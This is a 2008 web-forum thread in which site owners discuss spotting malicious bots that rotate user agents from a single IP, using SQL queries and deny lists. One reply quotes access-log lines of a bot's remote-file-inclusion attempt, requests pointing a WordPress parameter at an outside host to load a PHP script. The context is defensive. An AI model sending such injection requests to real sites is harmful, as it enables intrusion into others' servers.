iEntry 10th Anniversary Forum Rules Search
WebProWorld
Register FAQ Calendar Mark Forums Read
Internet Security Discussion Forum This forum is for the discussion of security related issues. If you find a new Phishing scheme, spyware, virus or malicious site - let us know about it. If any of the above found you... here's where you ask for help.

Share Thread: & Tags

Share Thread:

Reply
 
LinkBack Thread Tools Display Modes
  #1 (permalink)  
Old 05-12-2008, 01:48 PM
wige's Avatar
Moderator
WebProWorld Moderator
 
Join Date: Jun 2006
Location: United States
Posts: 2,648
wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9
Default Deluge of the bots

Last Thursday, I developed and implemented a new logging system which aims to identify what products on my site are the most popular. The system is designed to be robust enough to both display to visitors a live list of what is popular, as well as show customized recommendations to users based on their browsing history. I designed the system to record not only the product viewed but the user's IP address and user agent, and record everything so I could get the largest data size possible to test the system with.

I came in today, and started analyzing the recorded data. In addition to the expected bots from Google/MSN/Yahoo, there were also the expected (and easily filtered) spambots. I also noticed a lot of visits from disguised bots, that I probably would never have found if not for the filters I added to this system. The following is from one such bot:

Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
220.95.108.239
2008-05-09 08:24:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
220.95.108.239
2008-05-09 08:31:45
Mozilla/5.0 (compatible; Googlebot/2.1; +How Google crawls my site)
220.95.108.239
2008-05-09 08:38:27
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
220.95.108.239
2008-05-09 08:44:52
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
220.95.108.239
2008-05-09 08:55:01
Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5
220.95.108.239
2008-05-09 09:23:43
Mozilla/5.0 (Macintosh; U; PPC Mac OS X; en) AppleWebKit/419.3 (KHTML, like Gecko) Safari/419.3
220.95.108.239
2008-05-09 09:31:08
Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)
220.95.108.239
2008-05-09 09:36:59
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Q312461)
220.95.108.239
2008-05-09 09:43:15
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
220.95.108.239
2008-05-09 09:48:44
Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)
220.95.108.239
2008-05-09 09:56:14
Mozilla/4.0 (compatible; MSIE 5.5; Windows 9
220.95.108.239
2008-05-09 09:59:23
Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4
220.95.108.239
2008-05-09 10:02:03
Googlebot/2.1 (+How Google crawls my site)
220.95.108.239
2008-05-09 10:04:41

Of course, this is only the traffic from that one bot, on one product page. There are hits from literally hundreds of similar bots on the same page, and this is spread across thousands of product pages.

Is there any way I might be able to programmatically filter these bad bots out? Even if it is just an SQL query that could spot the bots in a somewhat reliable way, and list them so I can remove them from the popularity system, and so I can add them to my deny list?
__________________
The best way to learn anything, is to question everything.
Reply With Quote
  #2 (permalink)  
Old 05-12-2008, 04:28 PM
incrediblehelp's Avatar
WebProWorld 1,000+ Club
WebProWorld MVP
 
Join Date: Jan 2004
Location: Live in Cincy Now
Posts: 7,573
incrediblehelp RepRank 4incrediblehelp RepRank 4incrediblehelp RepRank 4incrediblehelp RepRank 4incrediblehelp RepRank 4
Default Re: Deluge of the bots

Why not filter by IP?
Reply With Quote
  #3 (permalink)  
Old 05-12-2008, 05:18 PM
WebProWorld Pro
 
Join Date: Jan 2008
Posts: 294
Tech Manager RepRank 1
Default Re: Deluge of the bots

It doesn't look like a normal bot. It looks more like a malicious bot. I've been seeing a lot of these lately. My suggestion is that you capture the IP and user agent. Store the incoming data and then query the IP address and User Agent. If you have more than two user agents with the corresponding IP then add them to your deny list.
__________________
I use Country IP Blocks as added security for my networks and servers.
Reply With Quote
  #4 (permalink)  
Old 05-12-2008, 05:28 PM
wige's Avatar
Moderator
WebProWorld Moderator
 
Join Date: Jun 2006
Location: United States
Posts: 2,648
wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9
Default Re: Deluge of the bots

Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX. Also, if a user upgrades their browser, or has multiple computers on a home network, they could have more than one user agent logged per IP, and I would not want an automated process to block legitimate traffic as a result of that.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
__________________
The best way to learn anything, is to question everything.

Last edited by wige; 05-12-2008 at 05:32 PM.
Reply With Quote
  #5 (permalink)  
Old 05-12-2008, 05:43 PM
WebProWorld Pro
 
Join Date: Jan 2008
Posts: 294
Tech Manager RepRank 1
Default Re: Deluge of the bots

Quote:
Originally Posted by wige View Post
Yeah, that is what I am looking to do, but I need to grab the most suspect IP addresses from the database, and I am unsure what tolerances I should use.

Right now, the query SELECT IP, COUNT(DISTINCT useragent) AS Agents, COUNT(DISTINCT productID) as Products FROM pageviews GROUP BY IP ORDER BY Agents DESC; gives me the following table:

117.102.128.221 9 1
77.127.155.176 9 1
125.204.58.200 8 1
190.50.125.136 8 1
216.198.139.38 8 1
220.95.108.239 8 1
66.63.219.212 8 1
87.205.215.237 8 1
89.3.18.208 8 1
79.177.161.75 7 1
85.180.253.111 7 1

The first number is the number of unique user agents, and the second is the number of products they viewed. Note: it is not unusual for legitimate users to view the same product several times due to users re-viewing the page with AJAX.

Obviously, I think using nine different user agents to view a single product is highly suspect, but I am not sure where I should draw the line, and if there are other aspects I should be considering before deciding which IPs to block.
Let me give you an example of malicious ativity from likely botnets (most likely infected systems). The following is an example of a single IP address, showing multiple platforms and user agents. This particular bot is attempting to inject a malicious script into a WordPress site (I've added spaces so the malicious url can't be clicked on):

80.230.118.211 - - [12/May/2008:06:39:29 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Googlebot/2.1 (h t t p:// googlebot.com/bot. html)"
80.230.118.211 - - [12/May/2008:06:48:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)"
80.230.118.211 - - [12/May/2008:06:53:47 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 95)"
80.230.118.211 - - [12/May/2008:06:58:42 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98; Win 9x 4.90; H010818; AT&T CSM6.0)"
80.230.118.211 - - [12/May/2008:07:03:35 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (compatible; Konqueror/3.0-rc1; i686 Linux; 20020527)"
80.230.118.211 - - [12/May/2008:07:10:53 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows 9"
80.230.118.211 - - [12/May/2008:07:19:51 -0500] "GET /?p=http:// ironmanshome . chat. ru/images? HTTP/1.0" 302 - "-" "Mozilla/5.0 (Windows; U; Windows NT 5.2; pt-BR; rv:1.7.7) Gecko/20050414 Firefox/2.0.5"

This "bot" initially pretends to be a Google bot but it quickly becomes apparent that such is not the case. It's obviously attempting to bypass traditional filters that rely on certain criteria. In this case it attempts to cloaks its identity by changing the platform and user agent. This in itself is the signature of undesirable traffic.

In the above case I am redirecting the traffic elsewhere based on several different pieces of information: IP, Platform, User Agent and of course the obvious attempt to remotely inject a PHP script into the WordPress variables.

In your case I think it is best to contain the IP address if it has more than two changes. This would include platform and user agent. You could also add a time element into the mix and use it as the deciding factor with the first two elements..
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 05:57 PM.
Reply With Quote
  #6 (permalink)  
Old 05-12-2008, 05:55 PM
wige's Avatar
Moderator
WebProWorld Moderator
 
Join Date: Jun 2006
Location: United States
Posts: 2,648
wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9wige RepRank 9
Default Re: Deluge of the bots

Cool. My log does look quite similar to yours, so it is probably a similar system to what I am encountering. I guess the final part of this would be, is there a way I can specify a text file for Apache to use as a deny list that can be regularly updated without restarting the server?
__________________
The best way to learn anything, is to question everything.
Reply With Quote
  #7 (permalink)  
Old 05-12-2008, 06:00 PM
WebProWorld Pro
 
Join Date: Jan 2008
Posts: 294
Tech Manager RepRank 1
Default Re: Deluge of the bots

You could use a text file but I suggest you use a database solution. Establish the acceptable criteria and then redirect traffic that doesn't meet that criteria. In fact, it's simple enough to redirect the traffic back to the questionable IP. You could even apprend the redirect with a message if you so choose.

Then you could add problematic IPs to your .htaccess file at a later date. But the database solution will be quicker and probably use less resources than loading the .htaccess file each time.
__________________
I use Country IP Blocks as added security for my networks and servers.

Last edited by Tech Manager; 05-12-2008 at 06:06 PM.
Reply With Quote
Reply

  WebProWorld > Webmaster, IT and Security Discussion > Internet Security Discussion Forum

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off
Trackbacks are On
Pingbacks are On
Refbacks are On


Similar Threads
Thread Thread Starter Forum Replies Last Post
Finding humor in the deluge of spam emails! TrafficProducer The Castle Breakroom (General: Any Topic) 3 04-08-2006 04:20 AM
Tracking Bots bretlawson Google Discussion Forum 0 01-09-2005 04:09 PM
Search Bots ohlson Graphics & Design Discussion Forum 1 09-10-2004 01:54 PM
Different Google Bots? Pokeey Google Discussion Forum 1 03-08-2004 12:56 PM
Shallow Bots - Deep Bots? jonathan-uk Google Discussion Forum 1 02-01-2004 09:32 PM


All times are GMT -4. The time now is 07:47 AM.



Search Engine Optimization by vBSEO 3.3.0